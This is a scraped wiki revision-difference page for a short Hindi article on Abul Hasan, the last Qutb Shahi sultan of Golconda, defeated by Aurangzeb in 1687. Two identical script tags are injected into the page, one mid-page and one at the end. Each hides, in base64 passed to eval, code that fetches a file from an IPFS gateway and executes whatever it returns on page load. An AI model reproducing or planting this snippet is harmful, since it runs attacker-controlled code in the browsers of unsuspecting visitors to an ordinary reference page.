Difference between revisions of "अबुल हसन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अबुल हसन''' (1672-1687 ई.) गोलकुंडा के क़ुतुबशाही वंश का आ...' के साथ नया पन्ना बनाया)
 
 
(2 intermediate revisions by the same user not shown)
Line 1: Line 1:
'''अबुल हसन''' (1672-1687 ई.) [[गोलकुंडा]] के [[क़ुतुबशाही वंश]] का आठवाँ और अन्तिम सुल्तान था। उसे 'अबुल हसन तानाशा' भी कहा जाता था।
+
{{बहुविकल्प|बहुविकल्पी शब्द=अबुल हसन|लेख का नाम=अबुल हसन (बहुविकल्पी)}}
 
+
'''अबुल हसन''' (1672-1687 ई.) [[गोलकुंडा]] के [[क़ुतुबशाही वंश]] का आठवाँ और अन्तिम सुल्तान था। उसे 'अबुल हसन तानाशाह' भी कहा जाता था।<br />
#[[मुग़ल]] सम्राट [[औरंगज़ेब]] अबुल हसन से नाराज़ हो गया था।
+
<br />
#उसने 1687 ई. में अबुल हसन को बड़ी ही आसानी से पराजित कर दिया।
+
*[[मुग़ल]] सम्राट [[औरंगज़ेब]] अबुल हसन से नाराज़ हो गया था।
 +
*उसने 1687 ई. में अबुल हसन को बड़ी ही आसानी से पराजित कर दिया।
 
*औरंगज़ेब ने उसे राजगद्दी से हटा दिया और [[दौलताबाद]] के क़िले में क़ैद रखा।
 
*औरंगज़ेब ने उसे राजगद्दी से हटा दिया और [[दौलताबाद]] के क़िले में क़ैद रखा।
 
*यहाँ पर कुछ ही वर्षों के बाद अबुल हसन की मृत्यु हो गई।
 
*यहाँ पर कुछ ही वर्षों के बाद अबुल हसन की मृत्यु हो गई।
 
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 16:07, 4 May 2020

chitr:Disamb2.jpg abul hasan ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- abul hasan (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

abul hasan (1672-1687 ee.) golakuanda ke qutubashahi vansh ka athavaan aur antim sultan tha. use 'abul hasan tanashah' bhi kaha jata tha.

  • mugal samrat aurangazeb abul hasan se naraz ho gaya tha.
  • usane 1687 ee. mean abul hasan ko b di hi asani se parajit kar diya.
  • aurangazeb ne use rajagaddi se hata diya aur daulatabad ke qile mean qaid rakha.
  • yahaan par kuchh hi varshoan ke bad abul hasan ki mrityu ho gee.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 161 |


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>